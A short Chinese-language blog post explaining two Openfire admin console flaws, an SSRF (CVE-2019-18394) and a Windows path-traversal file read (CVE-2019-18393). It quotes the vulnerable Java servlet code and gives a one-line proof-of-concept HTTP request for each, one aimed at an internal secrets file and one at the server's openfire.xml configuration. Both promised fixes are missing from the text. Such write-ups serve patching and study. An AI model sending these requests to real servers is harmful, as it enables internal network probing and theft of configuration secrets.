Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc
阿新 • • 發佈:2020-08-05
Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。
SSRF CVE-2019-18394
該漏洞允許未授權使用者發起SSRF攻擊,相關程式碼如下
FaviconServlet.java
... public void doGet(HttpServletRequest request, HttpServletResponse response) { String host = request.getParameter("host"); // Check special cases where we need to change host to get a favicon host = "gmail.com".equals(host) ? "google.com" : host; byte[] bytes = getImage(host, defaultBytes); if (bytes != null) { writeBytesToStream(bytes, response); } } private byte[] getImage(String host, byte[] defaultImage) { // If we've already attempted to get the favicon twice and failed, // return the default image. if (missesCache.get(host) != null && missesCache.get(host) > 1) { // Domain does not have a favicon so return default icon return defaultImage; } // See if we've cached the favicon. if (hitsCache.containsKey(host)) { return hitsCache.get(host); } byte[] bytes = getImage("http://" + host + "/favicon.ico"); .... } ...
很簡單的一個漏洞,poc如下
GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1
修復方法如下
任意檔案讀取漏洞
該漏洞隻影響windows下安裝openfire的使用者,相關程式碼如下
PluginServlet.java
... @Overridepublic void service(HttpServletRequest request, HttpServletResponse response) { String pathInfo = request.getPathInfo(); if (pathInfo == null) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); } else { try { // Handle JSP requests. if (pathInfo.endsWith(".jsp")) { ... } // Handle servlet requests. else if (getServlet(pathInfo) != null) { handleServlet(pathInfo, request, response); } // Handle image/other requests. else { handleOtherRequest(pathInfo, response); } } ... } private void handleOtherRequest(String pathInfo, HttpServletResponse response) throws IOException { String[] parts = pathInfo.split("/"); // Image request must be in correct format. if (parts.length < 3) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } String contextPath = ""; int index = pathInfo.indexOf(parts[1]); if (index != -1) { contextPath = pathInfo.substring(index + parts[1].length()); } File pluginDirectory = new File(JiveGlobals.getHomeDirectory(), "plugins"); File file = new File(pluginDirectory, parts[1] + File.separator + "web" + contextPath); // When using dev environment, the images dir may be under something other that web. Plugin plugin = pluginManager.getPlugin(parts[1]); ... }
poc如下
GET /plugins/search/..\..\..\conf\openfire.xml HTTP/1.1
Host: localhost:9090
Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;
修復方法如下